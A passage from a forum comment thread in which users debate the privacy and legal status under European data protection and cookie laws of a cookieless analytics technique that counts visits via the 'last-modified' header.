A cookie doesn't have to contain a fingerprint though.

In the same way, nothing in their current method necessarily says they couldn't find a way to insert a fingerprint here.

bonestamp2 · on Nov 30, 2022

Fair enough. At least they've told us how it works, so if the data no longer matches that methodology in the future then we can speculate that they've implanted a UID, unless they tell us how it works again and the data is consistent with the new methodology.

o_m · on Nov 30, 2022

Cookie tracking without consent is illegal in Europe, so it is a clever way to still do some basic web analytics.

roelschroeven · on Nov 30, 2022

Tracking without consent is illegal in Europe, regardless of the method. Alternative tracking methods are not workarounds to get around the law; they are only workarounds in trying not to be caught.

masklinn · on Nov 30, 2022

Tracking without consent is illegal. This is a clever way to get absolutely reamed, because you’re not only in breach of data protection laws you’re actively trying to obfuscate it.

andix · on Nov 30, 2022

The obfuscation part is probably irrelevant from a legal perspective.

atoav · on Nov 30, 2022

Yeah nice try. Law makers are not that stupid. Any way of storing personal data is subject to this regulation.

And before you try the next thing, personal data is everything that can be linked to a specific user, e.g. IP addresses have been ruled to be personal data, some uuid that helps you identify a user as well.

People should really read the law, and/or at least literate commentary on it instead of assuming things or repeating what someone else assumed.

mytailorisrich · on Nov 30, 2022

This is definitely not personal data. The piece of information is not linked to an individual and cannot be used to identify an individual (not the same as a 'user'), not least because it is not unique to each visitor: According to the article all first requests get the same 'last-modified' date, same for all second requests, etc.

Still, this stores data in the browser in a way that might be deemed a technology similar to a cookie, and therefore this might still fall within the various cookie laws, but this is completely outside of personal data regs.

tobr · on Nov 30, 2022

That’s pretty clever. I think if you really want to keep it privacy respecting, you should stop counting at 1 - so you can distinguish the first vs subsequent visits, but you can’t tell if someone has visited 2 or 200 times.

cortesoft · on Nov 30, 2022

I am having trouble understanding how knowing someone has visited three times is more privacy invasive than knowing they visited twice. What is so magical about 3?